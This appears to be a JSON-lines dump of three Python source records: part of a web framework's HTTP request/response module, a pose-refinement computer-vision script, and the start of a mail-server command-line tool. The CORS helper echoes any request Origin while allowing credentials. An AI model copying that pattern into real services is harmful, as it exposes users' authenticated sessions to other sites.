# https://github.com/un33k/django-ipware\n # http://www.ietf.org/rfc/rfc3330.txt (IPv4)\n # http://www.ietf.org/rfc/rfc5156.txt (IPv6)\n # https://en.wikipedia.org/wiki/Reserved_IP_addresses\n format_regex = re.compile(r'\\s')\n ip_regex = re.compile(r'^(?:{})'.format(r'|'.join([\n r'0\\.', # reserved for 'self-identification'\n r'10\\.', # class A\n r'169\\.254', # link local block\n r'172\\.(?:1[6-9]|2[0-9]|3[0-1])\\.', # class B\n r'192\\.0\\.2\\.', # documentation/examples\n r'192\\.168', # class C\n r'255\\.{3}', # broadcast address\n r'2001\\:db8', # documentation/examples\n r'fc00\\:', # private\n r'fe80\\:', # link local unicast\n r'ff00\\:', # multicast\n r'127\\.', # localhost\n r'\\:\\:1' # localhost\n ])))\n\n ips = self.ips\n for ip in ips:\n if not format_regex.search(ip) and not ip_regex.match(ip):\n r = ip\n break\n\n return r\n\n @_property\n def host(self):\n \"\"\"return the request host\"\"\"\n return self.get_header(\"host\")\n\n @_property\n def scheme(self):\n \"\"\"return the request scheme (eg, http, https)\"\"\"\n scheme = self.environ.get('wsgi.url_scheme', \"http\")\n return scheme\n\n @_property\n def port(self):\n \"\"\"return the server port\"\"\"\n return int(self.environ.get('SERVER_PORT', 0))\n\n @property\n def host_url(self):\n \"\"\"return the request host as a Url instance\"\"\"\n return self.url.host_url()\n\n @property\n def url(self):\n \"\"\"return the full request url as an Url() instance\"\"\"\n scheme = self.scheme\n host = self.host\n path = self.path\n query = self.query\n port = self.port\n\n # normalize the port\n host_domain, host_port = Url.split_hostname_from_port(host)\n if host_port:\n port = host_port\n\n controller_path = \"\"\n if self.controller_info:\n controller_path = self.controller_info.get(\"path\", \"\")\n\n u = Url(\n scheme=scheme,\n 
hostname=host,\n path=path,\n query=query,\n port=port,\n controller_path=controller_path,\n )\n return u\n\n @_property\n def path(self):\n \"\"\"path part of a url (eg, http://host.com/path?query=string)\"\"\"\n self._path = ''\n path_args = self.path_args\n path = \"/{}\".format(\"/\".join(path_args))\n return path\n\n @_property\n def path_args(self):\n \"\"\"the path converted to list (eg /foo/bar becomes [foo, bar])\"\"\"\n self._path_args = []\n path = self.path\n path_args = filter(None, path.split('/'))\n return path_args\n\n @_property\n def query(self):\n \"\"\"query_string part of a url (eg, http://host.com/path?query=string)\"\"\"\n self._query = query = \"\"\n\n query_kwargs = self.query_kwargs\n if query_kwargs: query = urllib.urlencode(query_kwargs, doseq=True)\n return query\n\n @_property\n def query_kwargs(self):\n \"\"\"{foo: bar, baz: che}\"\"\"\n self._query_kwargs = query_kwargs = {}\n query = self.query\n if query: query_kwargs = self._parse_query_str(query)\n return query_kwargs\n\n @_property\n def body(self):\n \"\"\"return the raw version of the body\"\"\"\n body = None\n if self.body_input:\n body = self.body_input.read(self.get_header('content-length', -1))\n\n return body\n\n @body.setter\n def body(self, body):\n if hasattr(self, \"_body_kwargs\"):\n del(self._body_kwargs)\n\n self.body_input = None\n self._body = body\n\n @_property\n def body_kwargs(self):\n \"\"\"\n the request body, if this is a POST request\n\n this tries to do the right thing with the body, so if you have set the body and\n the content type is json, then it will return the body json decoded, if you need\n the original string body, use body\n\n example --\n\n self.body = '{\"foo\":{\"name\":\"bar\"}}'\n b = self.body_kwargs # dict with: {\"foo\": { \"name\": \"bar\"}}\n print self.body # string with: '{\"foo\":{\"name\":\"bar\"}}'\n \"\"\"\n body_kwargs = {}\n ct = self.get_header(\"content-type\")\n if ct:\n ct = ct.lower()\n if ct.rfind(\"json\") >= 0:\n body = self.body\n if body:\n body_kwargs = json.loads(body)\n\n else:\n if self.body_input:\n body = RequestBody(\n fp=self.body_input,\n headers=self.headers,\n environ=self.environ\n #environ=self.raw_request\n )\n\n body_kwargs = dict(body)\n\n else:\n body = self.body\n if body:\n body_kwargs = self._parse_query_str(body)\n\n return body_kwargs\n\n @body_kwargs.setter\n def body_kwargs(self, body_kwargs):\n self.body_input = None\n self._body_kwargs = body_kwargs\n self._body = self._build_body_str(body_kwargs)\n\n @property\n def kwargs(self):\n \"\"\"combine GET and POST params to be passed to the controller\"\"\"\n kwargs = dict(self.query_kwargs)\n kwargs.update(self.body_kwargs)\n\n return kwargs\n\n def __init__(self):\n self.environ = Headers()\n super(Request, self).__init__()\n\n def version(self, content_type=\"*/*\"):\n \"\"\"\n versioning is based off of this post \n http://urthen.github.io/2013/05/09/ways-to-version-your-api/\n \"\"\"\n v = \"\"\n accept_header = self.get_header('accept', \"\")\n if accept_header:\n a = AcceptHeader(accept_header)\n for mt in a.filter(content_type):\n v = mt[2].get(\"version\", \"\")\n if v: break\n\n return v\n\n def is_method(self, method):\n \"\"\"return True if the request method matches the passed in method\"\"\"\n return self.method.upper() == method.upper()\n\n def has_body(self):\n #return self.method.upper() in set(['POST', 'PUT'])\n return True if self.body_kwargs else False\n #return self.method.upper() not in set(['GET'])\n\n def get_auth_bearer(self):\n \"\"\"return the 
bearer token in the authorization header if it exists\"\"\"\n        access_token = ''\n        auth_header = self.get_header('authorization')\n        if auth_header:\n            m = re.search(r\"^Bearer\\s+(\\S+)$\", auth_header, re.I)\n            if m: access_token = m.group(1)\n\n        return access_token\n\n    def get_auth_basic(self):\n        \"\"\"return the username and password of a basic auth header if it exists\"\"\"\n        username = ''\n        password = ''\n        auth_header = self.get_header('authorization')\n        if auth_header:\n            m = re.search(r\"^Basic\\s+(\\S+)$\", auth_header, re.I)\n            if m:\n                auth_str = base64.b64decode(m.group(1))\n                username, password = auth_str.split(':', 1)\n\n        return username, password\n\n\nclass Response(Http):\n    \"\"\"The Response object, every request instance that comes in will get a\n    corresponding Response instance that answers the Request.\n\n    an instance of this class is used to create the text response that will be sent \n    back to the client\n\n    Response has a ._body and .body, the ._body property is the raw value that is\n    returned from the Controller method that handled the request, the .body property\n    is a string that is ready to be sent back to the client, so it is _body converted\n    to a string. The reason _body isn't named body_kwargs is because _body can be\n    almost anything (not just a dict)\n    \"\"\"\n\n    encoding = \"\"\n\n    @property\n    def code(self):\n        \"\"\"the http status code to return to the client, by default, 200 if a body is present otherwise 204\"\"\"\n        code = getattr(self, '_code', None)\n        if not code:\n            if self.has_body():\n                code = 200\n            else:\n                code = 204\n\n        return code\n\n    @code.setter\n    def code(self, v):\n        self._code = v\n\n    @property\n    def status(self):\n        if not getattr(self, '_status', None):\n            c = self.code\n            status_tuple = BaseHTTPRequestHandler.responses.get(self.code)\n            msg = \"UNKNOWN\"\n            if status_tuple: msg = status_tuple[0]\n            self._status = msg\n\n        return self._status\n\n    @status.setter\n    def status(self, v):\n        self._status = v\n\n    @property\n    def body(self):\n        \"\"\"return the body, formatted to the appropriate content type\"\"\"\n        b = getattr(self, \"_body\", None)\n#         b = None\n#         if hasattr(self, '_body'):\n#             b = self._body\n        return self.normalize_body(b)\n\n    @body.setter\n    def body(self, v):\n        self._body = v\n        if self.has_streaming_body():\n            filepath = getattr(v, \"name\", \"\")\n            if filepath:\n                mt = MimeType.find_type(filepath)\n                filesize = os.path.getsize(filepath)\n                self.set_header(\"Content-Type\", mt)\n                self.set_header(\"Content-Length\", filesize)\n                logger.debug(\n                    \"Response body set to file: \\\"{}\\\" with mimetype: \\\"{}\\\" and size: {}\".format(\n                        filepath,\n                        mt,\n                        filesize\n                    )\n                )\n\n            else:\n                logger.warn(\"Response body is a filestream that has no .filepath property\")\n\n    def has_body(self):\n        return getattr(self, \"_body\", None) is not None\n#         ret = False\n#         if hasattr(self, '_body'):\n#             r = getattr(self, '_body', None)\n#             if r is not None: ret = True\n# \n#         return ret\n\n    def has_streaming_body(self):\n        \"\"\"return True if the response body is a file pointer\"\"\"\n        # http://stackoverflow.com/questions/1661262/check-if-object-is-file-like-in-python\n        return hasattr(self._body, \"read\") if self.has_body() else False\n\n    def normalize_body(self, b):\n        \"\"\"return the body as a string, formatted to the appropriate content type\"\"\"\n        if b is None: return ByteString(b'', self.encoding)\n\n        if self.is_json():\n            # I don't like this, if we have a content type but it isn't one\n            # of the supported ones we were returning the exception, which threw\n            # Jarid off, but 
now it just returns a string, which is not best either\n # my thought is we could have a body_type_subtype method that would \n # make it possible to easily handle custom types\n # eg, \"application/json\" would become: self.body_application_json(b, is_error)\n b = json.dumps(b, cls=ResponseBody)\n\n else:\n # just return a string representation of body if no content type\n b = ByteString(b, self.encoding)\n\n return b\n\n def is_json(self):\n ct = self.get_header('Content-Type')\n return ct.lower().rfind(\"json\") >= 0 if ct else False\n\n def __iter__(self):\n if self.has_streaming_body():\n fp = self._body\n if fp.closed:\n raise IOError(\"cannot read streaming body because pointer is closed\")\n\n # http://stackoverflow.com/questions/15599639/whats-perfect-counterpart-in-python-for-while-not-eof\n for chunk in iter(partial(fp.read, 8192), ''):\n yield ByteString(chunk)\n\n # close the pointer since we've consumed it\n fp.close()\n\n else:\n yield self.body\n\n def set_cors_headers(self, request_headers, custom_response_headers=None):\n\n allow_headers = request_headers['Access-Control-Request-Headers']\n allow_method = request_headers['Access-Control-Request-Method']\n origin = request_headers['origin']\n\n cors_headers = {\n 'Access-Control-Allow-Origin': origin,\n 'Access-Control-Allow-Credentials': 'true',\n 'Access-Control-Allow-Methods': allow_method,\n 'Access-Control-Allow-Headers': allow_headers,\n 'Access-Control-Max-Age': 3600\n }\n\n if custom_response_headers:\n cors_headers.update(custom_response_headers)\n\n self.add_headers(cors_headers)\n\n def is_success(self):\n \"\"\"return True if this response is considered a \"successful\" response\"\"\"\n code = self.code\n return code < 400\n\n\n","sub_path":"endpoints/http.py","file_name":"http.py","file_ext":"py","file_size_in_byte":40337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"74330125","text":"from pytless import inout, renderer, misc\nimport os\nimport numpy as np\nimport scipy.misc\nimport cv2\nimport sys\nimport math\nimport json\nimport PyKDL\nimport numpy\nimport glob\nfrom scipy.optimize import minimize, differential_evolution\nfrom ariadne import Ariadne, ImageSegmentator\n\n\nclass SuperpixelOptimizer(object):\n DEFAULT_FORMAT = 'XYZQ'\n\n def __init__(self, image, K, model, instance_frame, ariadne, debug=False):\n self.image = image\n self.K = K\n self.im_size = (640, 480)\n self.debug = debug\n self.output_image = ariadne.graph.generateBoundaryImage(image)\n self.ariadne = ariadne\n self.model = model\n self.instance_frame = instance_frame\n self.lsd = cv2.createLineSegmentDetector(0)\n self.gains = np.array([1.0, 1, 1, 5, 5, 5, 5])*0.1\n\n def optimizeSuperpixels(self, x):\n\n x = x.reshape(6,).copy()\n base_frame = self.instance_frame\n # x = np.multiply(x, self.gains)\n\n frame = KDLFromArray(x, fmt=LineOptimizer.DEFAULT_FORMAT)\n frame = base_frame*frame\n\n matrix = KLDtoNumpyMatrix(frame)\n R = matrix[:3, :3]\n t = matrix[:3, 3]*1000.0\n\n ren_rgb = renderer.render(self.model, self.im_size, self.K, R, t,\n mode='rgb', surf_color=[0, 1.0, 0])\n\n nonzeroindices = np.argwhere(ren_rgb > 0)\n labels = set(\n ariadne.graph.labels[nonzeroindices[:, 0], nonzeroindices[:, 1]])\n # print(\"LABELS\", )\n # for index in nonzeroindices:\n # label = ariadne.graph.labels[index[0], index[1]]\n # labels[label] = True\n\n zero = np.zeros(self.image.shape[:2])\n output_image = self.output_image.copy()\n for l in labels:\n label_indices = 
np.argwhere(ariadne.graph.labels == l)\n\n output_image[label_indices[:, 0], label_indices[:, 1]] = np.array(\n [255, 255, 255]).astype(np.uint8)\n\n zero[label_indices[:, 0], label_indices[:, 1]] = np.array(\n [255]).astype(np.uint8)\n\n output_image[nonzeroindices[:, 0], nonzeroindices[:, 1]] = np.array(\n [255, 0, 255]).astype(np.uint8)\n zero[nonzeroindices[:, 0], nonzeroindices[:, 1]] = 0\n\n # cv2.imshow(\"model\", ren_rgb)\n # cv2.imshow(\"image\", output_image)\n # cv2.imshow(\"zero\", zero)\n # c = cv2.waitKey(1)\n\n count = np.count_nonzero(zero.ravel())\n\n if count == 0:\n count = np.inf\n\n # print(\"CURENT X\", x, count)\n return count\n\n def getGradientOrientation(self, image):\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n gx = cv2.Sobel(gray, cv2.CV_64F, 1, 0, ksize=1)\n gy = cv2.Sobel(gray, cv2.CV_64F, 0, 1, ksize=1)\n blurredgx = cv2.GaussianBlur(gx, (11, 3), 1)\n blurredgy = cv2.GaussianBlur(gy, (11, 3), 1)\n magnitude, angle = cv2.cartToPolar(blurredgx, blurredgy)\n return angle\n\n def optimizeGradientOrientation(self, x):\n\n x = x.reshape(7,).copy()\n base_frame = self.instance_frame\n frame = KDLFromArray(x, fmt=LineOptimizer.DEFAULT_FORMAT)\n frame = base_frame*frame\n matrix = KLDtoNumpyMatrix(frame)\n R = matrix[:3, :3]\n t = matrix[:3, 3]*1000.0\n ren_rgb = renderer.render(self.model, self.im_size, self.K, R, t,\n mode='rgb', surf_color=[100, 100, 100])\n\n image_angle = self.getGradientOrientation(self.image)\n model_angle = self.getGradientOrientation(ren_rgb)\n\n mask = np.zeros(image_angle.shape)\n mask[model_angle > 0] = image_angle[model_angle > 0]\n\n diff = np.abs(mask-model_angle)\n\n e = np.sum(diff.ravel())\n output = image.copy()\n output[ren_rgb > 0] = ren_rgb[ren_rgb > 0]\n\n cv2.imshow(\"image\", image_angle)\n cv2.imshow(\"model\", model_angle)\n cv2.imshow(\"mask\", diff)\n cv2.imshow(\"output\", output)\n\n cv2.waitKey(1)\n print(\"Error\", e)\n return e\n\n def optimizeSuperpixelsReduced(self, x):\n\n x = x.reshape(7,).copy()\n\n base_frame = self.instance_frame\n #x = np.multiply(x, self.gains)\n\n frame = KDLFromArray(x, fmt=LineOptimizer.DEFAULT_FORMAT)\n frame = base_frame*frame\n\n matrix = KLDtoNumpyMatrix(frame)\n R = matrix[:3, :3]\n t = matrix[:3, 3]*1000.0\n\n ren_rgb = renderer.render(self.model, self.im_size, self.K, R, t,\n mode='rgb', surf_color=[0, 1.0, 0])\n\n nonzeroindices = np.argwhere(ren_rgb > 0)\n labels_raw = ariadne.graph.labels[\n nonzeroindices[:, 0],\n nonzeroindices[:, 1]\n ].ravel()\n labels = np.unique(labels_raw)\n\n y = np.bincount(labels_raw)\n ii = np.nonzero(y)[0]\n labels_count = dict(zip(ii, y[ii]))\n labels_variance = np.var(y[ii])\n #print(\"LABELS_COUNT\", labels_count, dict(labels_count))\n # And then:\n\n # print(\"LABELS\", labels)\n # for index in nonzeroindices:\n # label = ariadne.graph.labels[index[0], index[1]]\n # labels[label] = True\n\n zero = np.zeros(self.image.shape[:2])\n if self.debug:\n output_image = self.output_image.copy()\n counter = 0\n occupied = 0.0\n total = 0.0\n occupied_map = {}\n for l in labels:\n label_indices = np.argwhere(ariadne.graph.labels == l)\n counter += label_indices.shape[0]\n occupied_map[l] = float(labels_count[l]) / \\\n float(label_indices.shape[0])\n\n if occupied_map[l] > 0.0001:\n occupied += labels_count[l]\n total += label_indices.shape[0]\n\n if self.debug:\n output_image[label_indices[:, 0], label_indices[:, 1]] = np.array(\n [255, 255, 255]).astype(np.uint8)\n\n zero[label_indices[:, 0], label_indices[:, 1]] = np.array(\n 
[255]).astype(np.uint8)\n\n if self.debug:\n output_image[nonzeroindices[:, 0], nonzeroindices[:, 1]] = np.array(\n [255, 0, 255]).astype(np.uint8)\n zero[nonzeroindices[:, 0], nonzeroindices[:, 1]] = 0\n counter -= nonzeroindices.shape[0]\n\n void_space_single = 0.0\n for k, v in occupied_map.items():\n void_space_single += v\n void_space_single /= float(labels.shape[0])\n\n void_space = (float(total)-float(occupied))/float(total)\n #print(\"VOID_SPACE\", void_space, void_space_single)\n\n if self.debug:\n cv2.imshow(\"model\", ren_rgb)\n cv2.imshow(\"image\", output_image)\n cv2.imshow(\"zero\", zero)\n c = cv2.waitKey(1)\n\n #count = counter - labels_variance*0.01\n e = void_space\n print(\"COUNTER DIFFERENCE\", void_space,\n void_space*labels.shape[0], void_space_single)\n # if count == 0:\n # count = np.inf\n\n # print(\"CURENT X\", x, count)\n return e\n # return np.linalg.norm(x - np.array([0.05, 0.04, 0.03, 0.01, 0.01, 0.01, 5.0]))\n\n def runOptimization(self, opt_type=\"ga\"):\n if opt_type == 'ga':\n x0 = np.array([0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0])\n max_disp = 0.01\n max_angle = (15*math.pi/180.0)\n bounds = [\n (-max_disp, max_disp),\n (-max_disp, max_disp),\n (-max_disp, max_disp),\n (-max_angle, max_angle),\n (-max_angle, max_angle),\n (-max_angle, max_angle),\n (-max_angle, max_angle)\n ]\n\n res = differential_evolution(\n # self.optimizeSuperpixelsReduced,\n self.optimizeGradientOrientation,\n bounds=bounds, disp=True,\n strategy='best2bin',\n popsize=20, maxiter=5,\n polish=True, mutation=(0.5, 1)\n )\n\n else:\n # map(float, np.array(args['initial_guess']))\n x0 = np.array([0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0])\n max_disp = 0.01\n max_angle = (10*math.pi/180.0)\n bounds = [\n (-max_disp, max_disp),\n (-max_disp, max_disp),\n (-max_disp, max_disp),\n (-max_angle, max_angle),\n (-max_angle, max_angle),\n (-max_angle, max_angle),\n (-max_angle, max_angle)\n ]\n\n res = minimize(\n # self.optimizeSuperpixelsReduced,\n self.optimizeGradientOrientation,\n x0,\n method='L-BFGS-B',\n bounds=bounds,\n options={'maxiter': 100000, 'disp': True, 'eps': 0.001})\n print(\"RESULT\", res.x)\n return res.x\n\n\nclass LineOptimizer(object):\n DEFAULT_FORMAT = 'RPY'\n\n def __init__(self, K, image, model, instance_frame):\n self.K = K\n kernel = np.ones((3, 3), np.float32)/9.0\n self.image = cv2.filter2D(image, -1, kernel)\n self.gray = cv2.cvtColor(self.image, cv2.COLOR_BGR2GRAY)\n\n self.img_size = (640, 480)\n self.model = model\n self.instance_frame = instance_frame\n self.lsd = cv2.createLineSegmentDetector(0)\n self.gains = [1]*6 # [10, 10, 10, 50, 50, 50]\n\n def getEdgesWithThreshold(self, model, th=1.0):\n for edge, faces in self.model['edges_graph'].iteritems():\n if len(faces) >= 2:\n f1 = model['faces'][faces[0]]\n f2 = model['faces'][faces[1]]\n n1 = model['normals'][faces[0]]\n n2 = model['normals'][faces[1]]\n\n angle = math.acos(np.clip(np.dot(n1, n2), -1.0, 1.0))\n if angle > th:\n pass\n\n def drawSegments(self, image, segments, line_width=2, min_length=1):\n\n cop = image.copy()\n if segments is not None:\n for i in range(0, segments.shape[0]):\n line = segments[i, 0, :]\n p1 = line[: 2]\n p2 = line[2: 4]\n dist = np.linalg.norm(p1-p2)\n if dist < min_length:\n continue\n cv2.line(\n cop,\n tuple(line[:2].astype(int)),\n tuple(line[2:4].astype(int)),\n (255, 0, 0), line_width\n )\n return cop\n\n def runOptimization(self, opt_type=\"RGB\"):\n\n # map(float, np.array(args['initial_guess']))\n x0 = np.array([0.0, 0.0, 0.0, 0.0, 0.0, 0.0])\n max_disp = 0.5\n max_angle = 
3.0\n bounds = [\n (-max_disp, max_disp),\n (-max_disp, max_disp),\n (-max_disp, max_disp),\n (-max_angle, max_angle),\n (-max_angle, max_angle),\n (-max_angle, max_angle)\n ]\n\n def cb(x):\n print(\"Minimization\", x)\n\n if opt_type == \"LINES\":\n # res = minimize(self.optimize, x0,\n # method='L-BFGS-B',\n # bounds=bounds,\n\n # options={'maxiter': 100000, 'disp': True, 'eps': 0.001})\n\n res = differential_evolution(self.optimize,\n bounds=bounds\n )\n\n # res = minimize(self.optimize, x0,\n # method='Nelder-Mead',\n # bounds=bounds,\n # options={'maxiter': 100000, 'disp': True, 'fatol': 0.1})\n\n if opt_type == \"RGB\":\n res = minimize(self.optimizeRGBDifference, x0,\n method='Nelder-Mead',\n bounds=bounds,\n options={'maxiter': 100000, 'disp': True})\n\n # res = differential_evolution(self.optimizeRGBDifference,\n # bounds,\n # mutation=(0, 0.001)\n # )\n\n print(\"RESULT\", res.x)\n return np.multiply(res.x, self.gains)\n\n def optimize(self, x):\n\n x = x.reshape(6,).copy()\n base_frame = self.instance_frame\n x = np.multiply(x, self.gains)\n\n frame = KDLFromArray(x, fmt=LineOptimizer.DEFAULT_FORMAT)\n frame = base_frame*frame\n\n matrix = KLDtoNumpyMatrix(frame)\n R = matrix[:3, :3]\n t = matrix[:3, 3]*1000.0\n\n ren_rgb = renderer.render(\n self.model,\n self.img_size,\n self.K,\n R, t, mode='rgb', surf_color=(1, 1, 1), ambient_weight=0.0)\n\n rgb_lines = lsd.detect(self.gray)[0]\n model_lines = lsd.detect(cv2.cvtColor(ren_rgb, cv2.COLOR_BGR2GRAY))[0]\n\n zeros = np.zeros(self.gray.shape)\n rgb_lines_img = self.drawSegments(zeros, rgb_lines)\n model_lines_img = self.drawSegments(zeros, model_lines)\n\n rendered_image = cv2.addWeighted(self.image, 1, ren_rgb, 0.85, 0)\n\n # rgb_lines_img = lsd.drawSegments(zeros, rgb_lines)\n # model_lines_img = lsd.drawSegments(zeros, model_lines)\n # diff = rgb_lines_img - model_lines_img\n diff = cv2.bitwise_and(rgb_lines_img, model_lines_img)\n # diff = np.abs(diff.astype(np.uint8))\n\n count = np.count_nonzero(diff.ravel())\n print(\"MAXMIN\", np.min(diff), np.max(diff), count)\n\n cv2.imshow(\"model\", rendered_image)\n cv2.imshow(\"opt_rgb\", rgb_lines_img)\n cv2.imshow(\"opt_model\", model_lines_img)\n cv2.imshow(\"opt_diff\", diff)\n cv2.waitKey(10)\n return -count\n\n def optimizeRGBDifference(self, x):\n\n x = x.reshape(6,).copy()\n base_frame = self.instance_frame\n x = np.multiply(x, self.gains)\n\n if np.linalg.norm(x[:3]) > 0.2:\n return np.inf\n # x[3:] = x[3:]*180/math.pi\n\n frame = KDLFromArray(x, fmt=LineOptimizer.DEFAULT_FORMAT)\n frame = base_frame*frame\n\n matrix = KLDtoNumpyMatrix(frame)\n R = matrix[:3, :3]\n t = matrix[:3, 3]*1000.0\n\n ren_rgb = renderer.render(\n self.model,\n self.img_size,\n self.K,\n R, t, mode='rgb') # , surf_color=(76.0/255.0, 72.0/255.0, 82.0/255.0))\n\n gray = self.gray\n rgb_lines = lsd.detect(gray)[0]\n model_lines = lsd.detect(cv2.cvtColor(ren_rgb, cv2.COLOR_BGR2GRAY))[0]\n\n zeros = np.zeros(self.gray.shape)\n rgb_lines_img = self.drawSegments(zeros, rgb_lines)\n model_lines_img = self.drawSegments(zeros, model_lines)\n\n ren_rgb = cv2.cvtColor(ren_rgb, cv2.COLOR_BGR2GRAY)\n\n rendered_image = gray.copy()\n rendered_image[ren_rgb != 0] = ren_rgb[ren_rgb != 0]\n\n grayf = gray.astype(float)\n rendered_imagef = rendered_image.astype(float)\n\n diff = np.abs(grayf - rendered_imagef)/255.0\n\n # rgb_lines_img = lsd.drawSegments(zeros, rgb_lines)\n # model_lines_img = lsd.drawSegments(zeros, model_lines)\n\n count = np.sum(diff)\n print(\"MAXMIN\", np.min(diff), np.max(diff))\n\n 
cv2.imshow(\"model\", rendered_image)\n cv2.imshow(\"diff\", diff)\n cv2.waitKey(10)\n return count\n\n\ndef KDLtoArray(frame, fmt='RPY'):\n if fmt == 'XYZQ':\n p = frame.p\n q = frame.M.GetQuaternion()\n return numpy.array([\n p.x(), p.y(), p.z(), q[0], q[1], q[2], q[3]\n ]).reshape(1, 7)\n elif fmt == 'RPY':\n p = frame.p\n roll, pitch, yaw = frame.M.GetRPY()\n return numpy.array([\n p.x(), p.y(), p.z(), roll, pitch, yaw\n ]).reshape(1, 6)\n\n\ndef KDLFromArray(chunks, fmt='XYZQ'):\n if fmt == 'RPY':\n frame = PyKDL.Frame()\n frame.p = PyKDL.Vector(\n chunks[0], chunks[1], chunks[2]\n )\n frame.M = PyKDL.Rotation.RPY(\n chunks[3],\n chunks[4],\n chunks[5]\n )\n return frame\n if fmt == 'XYZQ':\n frame = PyKDL.Frame()\n frame.p = PyKDL.Vector(\n chunks[0], chunks[1], chunks[2]\n )\n q = np.array([chunks[3],\n chunks[4],\n chunks[5],\n chunks[6]])\n q = q / np.linalg.norm(q)\n frame.M = PyKDL.Rotation.Quaternion(q[0], q[1], q[2], q[3])\n return frame\n\n\ndef KLDtoNumpyMatrix(frame):\n M = frame.M\n R = numpy.array([\n [M[0, 0], M[0, 1], M[0, 2]],\n [M[1, 0], M[1, 1], M[1, 2]],\n [M[2, 0], M[2, 1], M[2, 2]],\n ])\n P = numpy.transpose(\n numpy.array([\n frame.p.x(),\n frame.p.y(),\n frame.p.z()\n ])\n )\n P = P.reshape(3, 1)\n T = numpy.concatenate([R, P], 1)\n T = numpy.concatenate([T, numpy.array([0, 0, 0, 1]).reshape(1, 4)], 0)\n return T\n\n\nimages_path = '/Users/daniele/Desktop/to_delete/roars_dataset/indust_scene_1_dome/camera_rgb_image_raw_compressed'\ndataset_path = '/Users/daniele/Desktop/to_delete/roars_dataset/indust_scene_1_dome.roars'\ncamera_extrinsics_path = '/Users/daniele/Desktop/to_delete/roars_dataset/indust_scene_1_dome/camera_extrinsics.txt'\ncamera_intrinsics_path = '/Users/daniele/Desktop/to_delete/roars_dataset/indust_scene_1_dome/camera_intrisics.txt'\nposes_path = '/Users/daniele/Desktop/to_delete/roars_dataset/indust_scene_1_dome/robot_poses.txt'\n#model_path = '/Users/daniele/Downloads/industrial_part2.ply'\nmodel_path = '/Users/daniele/Desktop/test.ply'\n\n#######################################\n# Model\n#######################################\nmodel = inout.load_ply(model_path)\n\n\n#######################################\n# Dataset data\n#######################################\njson_data = json.load(open(dataset_path))\n\n\n#######################################\n# Intrinsics\n#######################################\nK_raw = np.loadtxt(camera_intrinsics_path)\nK = np.array([\n [K_raw[2], 0, K_raw[4]],\n [0, K_raw[3], K_raw[5]],\n [0, 0, 1.0]\n])\n\n#######################################\n# Extrinsics\n#######################################\ncamera_extrinsics = KDLFromArray(np.loadtxt(camera_extrinsics_path))\nprint(\"CAMERA EXTRINSICS\", camera_extrinsics)\n\n#######################################\n# Poses\n#######################################\nposes = []\nraw_poses = np.loadtxt(poses_path)\nfor p in raw_poses:\n frame = KDLFromArray(p)*camera_extrinsics\n poses.append(frame)\n\n#######################################\n# Images\n#######################################\nimages = sorted(glob.glob(os.path.join(images_path, \"*.jpg\")))\nprint(len(poses), len(images))\n\ninstances_poses = []\nfor instance in json_data['classes']['5']['instances']:\n frame = KDLFromArray(instance['frame'])\n instances_poses.append(frame)\n print(frame)\n\n\nimage_path = sys.argv[1]\ninitial_guess = sys.argv[2]\nchunks = map(float, initial_guess.split(\";\"))\nprint(\"CH(NKS\", chunks)\ninitial_guess = KDLFromArray(chunks, fmt=\"RPY\")\n\ndindex = 20\n\nroll = -83\npitch = 
lsd = cv2.createLineSegmentDetector(0)\noptimized_correction = None  # PyKDL.Frame()\nwhile True:\n    image = cv2.imread(image_path)\n    gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\n    instance_frame = initial_guess\n\n    instance_frame_matrix = KLDtoNumpyMatrix(instance_frame)\n    R = instance_frame_matrix[:3, :3]\n    t = instance_frame_matrix[:3, 3]*1000.0\n    im_size = (640, 480)\n\n    print(\"OBJECT POSE\", instance_frame.M.GetQuaternion(), t)\n    ren_rgb = renderer.render(model, im_size, K, R, t,\n                              mode='rgb', surf_color=[0, 1.0, 0])\n\n    if optimized_correction is not None:\n        print(\"CORRECTING WITH\", optimized_correction)\n        instance_frame = instance_frame*optimized_correction\n    else:\n        image_copy = cv2.addWeighted(image, 1, ren_rgb, 0.85, 0)\n        cv2.imshow(\"image\", image_copy)\n        c = cv2.waitKey(0)\n\n    # opt.optimizeSuperpixels(np.array([0.0, 0, 0, 0, 0, 0]))\n\n    # if optimized_correction is not None:\n    #     print(\"CORRECTING WITH\", optimized_correction)\n    #     instance_frame = instance_frame*optimized_correction\n\n    # instance_frame_matrix = KLDtoNumpyMatrix(instance_frame)\n\n    instance_frame_matrix = KLDtoNumpyMatrix(instance_frame)\n    R = instance_frame_matrix[:3, :3]\n    t = instance_frame_matrix[:3, 3]*1000.0\n    im_size = (640, 480)\n    ren_rgb = renderer.render(model, im_size, K, R, t,\n                              mode='rgb', surf_color=[0, 1.0, 0])\n\n    image_copy = cv2.addWeighted(image, 1, ren_rgb, 0.85, 0)\n    cv2.imshow(\"model\", ren_rgb)\n    cv2.imshow(\"image\", image_copy)\n    c = cv2.waitKey(0)\n\n    if c == 111:\n        if optimized_correction is None:\n            segmentator = ImageSegmentator(segmentator_type='SLIC')\n            segmentator.options_map['n_segments'] = 1500  # 2500\n            segmentator.options_map['compactness'] = 10\n            segmentator.options_map['sigma'] = 1\n            #######################################\n            # Ariadne\n            #######################################\n            ariadne = Ariadne(\n                image_file=image_path, segmentator=segmentator)\n            opt = SuperpixelOptimizer(\n                image, K, model, instance_frame, ariadne, debug=True)\n            optimized_correction = KDLFromArray(\n                opt.runOptimization(), fmt=\"RPY\")\n\n    #######################################\n    # Roll\n    #######################################\n    if c == 114:\n        roll += 1.0\n    if c == 102:\n        roll -= 1.0\n\n    #######################################\n    # Pitch\n    #######################################\n    if c == 116:\n        pitch += 1.0\n    if c == 103:\n        pitch -= 1.0\n\n    print(c, \"Pitch\", pitch, \"Roll\", roll)\n    if c == 113:\n        break\n","sub_path":"test_single_image.py","file_name":"test_single_image.py","file_ext":"py","file_size_in_byte":21780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"177496708","text":"import argparse\nimport os\nimport sys\nimport ConfigParser\nimport asyncore\nimport re\nfrom daemonize import Daemonize\n\nfrom __init__ import __version__\nfrom logs import get_surgat_logger\nfrom replay import ReplayMessage\nfrom surgat import SurgatMailServer\n\n\nstartup_options = []\n\n\ndef filesize(sz):\n    # `sz is int` is always False for a value; isinstance is what was intended\n    if isinstance(sz, int):\n        return 